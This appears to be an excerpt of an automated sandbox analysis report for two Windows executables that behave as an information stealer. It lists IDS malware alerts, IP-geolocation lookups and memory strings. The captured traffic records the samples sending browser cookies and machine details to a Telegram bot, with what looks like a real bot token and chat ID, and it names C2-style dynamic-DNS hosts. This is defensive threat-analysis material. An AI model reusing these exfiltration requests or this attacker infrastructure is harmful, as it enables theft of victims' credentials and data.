                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2009/03/2025%20/%2014:24:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:19:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendDocument?chat_id=5022382431&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f9638252d94Host: api.telegram.orgContent-Length: 734
                Source: global trafficHTTP traffic detected: POST /bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendDocument?chat_id=5022382431&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5eeb09cb0cc4Host: api.telegram.orgContent-Length: 740
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49695 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49686 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49685 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49693 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49691 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49697 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.32.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49684 -> 104.21.32.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49683 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49687 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49690 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2009/03/2025%20/%2014:24:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:19:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendDocument?chat_id=5022382431&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5f9638252d94Host: api.telegram.orgContent-Length: 734
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:00:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:00:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: svchost.exe, 0000000F.00000002.2857824337.000002C68F6A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2856717060.000002C68F6A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.15.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: OtldpQxzAw.exe, 00000000.00000002.901255150.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.952651140.0000000003220000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002CAC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7990821173:AAFE3sYvVMUi8WKwRekB6r0KOeDU9Se_Bf0/sendDocument?chat_id=5022
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003280000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en0
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000327B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: svchost.exe, 0000000F.00000003.1203192613.000002C694E00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
